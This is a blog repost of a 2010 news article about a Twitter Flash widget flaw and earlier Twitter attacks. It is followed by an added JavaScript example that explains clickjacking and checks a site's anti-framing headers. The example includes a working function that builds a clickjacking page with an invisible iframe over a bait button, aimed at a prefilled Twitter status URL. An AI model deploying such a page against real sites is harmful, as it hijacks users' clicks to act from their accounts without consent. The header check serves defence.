XIAM007

Making Unique Observations in a Very Cluttered World

Sunday 24 January 2010

Reading - Twitter Widget Flaw Provides Access to User Accounts -

A widget based on Adobe's Flash Player was disabled by Twitter after a security analyst notified the company of a weakness that allowed access to targeted user accounts.

Mike Bailey, senior security analyst at Foreground Security, revealed the weakness in the Flash-based widget without publicly providing details of the Twitter exploit. He is scheduled to give a presentation on vulnerabilities in Adobe's Flash Player, including the one affecting Twitter's widget, at the Black Hat 2010 security conference in early February.

No Twitter user accounts were known to have been affected, though Bailey said that whether the flaw had already been exploited by attackers was "impossible to know".

Adobe Mum Over Widget

Adobe officials made no comment on the incident with the Twitter widget, but the company had disclosed details of the underlying Flash Player vulnerability after it was uncovered in 2006.

"As simple as the attack is, I've been finding them all over the place," Bailey told Reuters.

Bailey has pointed out weaknesses in Flash several times in the past, including the previous November, when he highlighted a different vulnerability that exposed a "huge number of sites" because of the way Flash Player and web browsers handle security policies for content uploaded to a site.

"The topic raised is not news; it's something that has been understood and discussed by the security community for years. Most importantly, this is not a vulnerability in Adobe Flash Player," Peleus Uhley wrote on Adobe's Secure Software Engineering Team (ASSET) blog in response to the November criticism.

It remains to be seen whether Adobe will respond the same way to the current widget incident. Then as now, the situation is difficult for Adobe: a patch to Flash Player could break web applications and widgets on websites across the Internet, yet leaving the behaviour unchanged leaves web users and server administrators exposed to an issue that remains unresolved.

"Web servers that choose to accept user-uploaded content also choose to accept risks that go along with that functionality," said Uhley.

History of Attacks, Vulnerabilities at Twitter

The social media company and its users have suffered through several notable attacks and vulnerabilities since Twitter began in early 2006.

One such vulnerability arose in 2007 and stemmed from Twitter's use of caller ID, the sender's phone number, to identify users sending commands by SMS. An attacker who spoofed that number could pass Twitter's authentication check and effectively take control of the associated user account.

Twitter users also fell prey to "clickjacking" attacks in February of last year. Lured by tweets reading "Don't Click", users who clicked were redirected to an unwanted website while, through a hidden frame, unwittingly posting the same bait message to their own followers, which kept the attack spreading.
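The mechanism behind the "Don't Click" attack, and the check a site operator can run against their own response headers to see whether a page can be framed by a third-party site, as an added JavaScript example that is not part of the original article or of Twitter's code. The target URL, the pixel offsets of the bait button and the sample response headers are constructed for the demonstration; real offsets depend on the target page's layout.

```javascript
// Added example, not code from the article or from Twitter: outline of the
// 2009 "Don't Click" clickjacking technique, and a check of whether a
// response's headers would stop a browser from framing the page.
// TARGET_URL, the offsets and SAMPLE_RESPONSES are constructed for the demo.

const TARGET_URL = "https://twitter.com/home?status=Don%27t%20Click";

// Minimal HTML escaping so the generated markup stays well-formed.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Attacker's page: a visible bait button, and on top of it a fully
// transparent iframe of the target, shifted so that the target's real
// submit button lands exactly under the bait. The victim's click is
// delivered to the framed page, which is already authenticated by the
// victim's cookies. (offsetX, offsetY) is where the submit button sits
// inside the target page; both values are assumed for the demo.
function buildClickjackPage(targetUrl, baitText, offsetX, offsetY) {
  const baitX = 100, baitY = 100;
  return [
    "<!doctype html><html><body>",
    `<button style="position:absolute;left:${baitX}px;top:${baitY}px;">${escapeAttr(baitText)}</button>`,
    `<iframe src="${escapeAttr(targetUrl)}" style="position:absolute;` +
      `left:${baitX - offsetX}px;top:${baitY - offsetY}px;` +
      `width:1000px;height:800px;opacity:0;z-index:2;border:0;"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Would a browser let a page served with `headers` be framed by a document
// whose origin is `framerOrigin`? Header names match case-insensitively.
// A CSP frame-ancestors directive takes precedence over X-Frame-Options when
// both are present, as modern browsers do.
function canBeFramed(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp
      .split(";")
      .map((d) => d.trim().split(/\s+/))
      .find((parts) => parts[0].toLowerCase() === "frame-ancestors");
    if (directive) {
      const sources = directive.slice(1).map((s) => s.toLowerCase());
      const framerHost = new URL(framerOrigin).host;
      if (sources.includes("'none'")) return false;
      return sources.some((src) =>
        src === "*" ||
        (src === "'self'" && framerOrigin === pageOrigin) ||
        src === framerOrigin.toLowerCase() ||
        src === framerHost ||
        (src.startsWith("*.") && framerHost.endsWith(src.slice(1)))
      );
    }
  }

  const xfo = h["x-frame-options"];
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === "DENY") return false;
    if (value === "SAMEORIGIN") return framerOrigin === pageOrigin;
    // ALLOW-FROM was only ever honoured by some browsers and is obsolete.
    if (value.startsWith("ALLOW-FROM ")) {
      return new URL(value.slice("ALLOW-FROM ".length)).origin === framerOrigin;
    }
    // Browsers ignore a malformed value, which means framing is allowed.
    return true;
  }

  // No anti-framing header at all: the page can be embedded anywhere,
  // which is the condition the 2009 attack relied on.
  return true;
}

// Constructed sample responses, as a site operator might capture them.
const SAMPLE_RESPONSES = {
  unprotected: { "Content-Type": "text/html" },
  xfoDeny: { "Content-Type": "text/html", "X-Frame-Options": "DENY" },
  xfoSameOrigin: { "Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN" },
  cspNone: { "Content-Type": "text/html", "Content-Security-Policy": "frame-ancestors 'none'" },
};

// Which of the sample responses could an attacker's page frame?
function assessFraming(pageOrigin, framerOrigin) {
  const result = {};
  for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
    result[name] = canBeFramed(headers, pageOrigin, framerOrigin);
  }
  return result;
}

console.log(assessFraming("https://twitter.com", "https://attacker.example"));
// → { unprotected: true, xfoDeny: false, xfoSameOrigin: false, cspNone: false }
```

The header check is the useful half for a defender: a page that only relies on a client-side "frame-busting" script (`if (top !== self) top.location = self.location`) can be kept framed by a hostile parent, whereas `X-Frame-Options` or `frame-ancestors` is enforced by the browser before the page's scripts run.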